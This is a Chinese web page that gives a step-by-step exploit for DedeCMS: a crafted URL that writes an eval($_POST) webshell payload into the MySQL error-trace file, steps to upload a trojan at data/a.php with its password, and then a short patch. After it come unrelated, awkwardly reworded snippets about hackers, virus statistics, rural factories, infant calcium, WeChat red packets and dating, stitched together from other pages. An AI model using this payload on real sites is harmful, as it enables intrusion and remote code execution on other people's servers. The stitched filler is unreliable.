假设域名是:www.abc.com 攻击步骤如下:
1. 访问网址:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见以下错误信息
注入成功
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. 执行附件地址:dede.rar里的文件 test.html,注意 form 中 action 的地址是
按确定后的看到第2步骤的信息表示文件木马上传成功。
木马网址:http://www.abc.com/data/a.php
密码:2006888
漏洞分析:
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
解决方案:
打开文件 include/dedesql.class.php
找到代码
@fwrite($fp, ‘<’.'?php’.”\r\n\r\n?”.”>\r\n”);
替换代码
@fwrite($fp, ‘<’.'?php’.”\r\nexit;\r\n\r\n?”.”>\r\n”);
清空 data/mysql_error_trace.php 文件内容
本文导读目录: 1、编程人员和网络工程师哪个才是黑客走的路啊? 2、黑客和网络工程师是一样吗? 3、请问一下现在网络工程师算不算黑客? 4、网络安全工程师和黑客的区别 5、电脑工程师和...
2019年4月,病毒进犯的态势在4月出现上升态势,病毒阻拦量比3月份上升近20%,近半年阻拦歹意程序数量趋势如下图所示:安排内部文件曝光相似的,用户能够运用–post来查找POST恳求。 安全三、安全...
在农村办一个厂成本费和风险性都比城区地域低许多,但要是没有因时制宜挑选开工厂种类,通过率不高和发展前途也并不大。因为在农村办厂的关键顾客是农户,掌握她们的要求和爱好就看起来尤为重要。 粮食作物制造厂...
一岁的时候是牙齿发育的关键时期,如果这时候缺钙的话,不仅长不高,还会影响牙齿的健康。那么,如何判断1岁宝宝是否缺钙?1岁宝宝缺钙怎么补呢?一起来看看吧! 1岁宝宝缺钙的症状 有的孩子缺钙表现为...
能够参加活动获得红包封面,随后再开展封面图设定。进入微信,进到微信聊天网页页面,点一下减号,大红包,再度挑选大红包,挑选红包封面,点一下应用该封面图就可以。 知名品牌型号规格:iPhone12 系统软...
有些人在谈恋爱的时候会表现出一种自卑的心理,这可能跟他的成长环境有关。 有些人天生就比较自信,有些人看样子就觉得是不够自信的人,其实很多时候这些是从成长环境中形成的。 如果男人是在谈恋爱...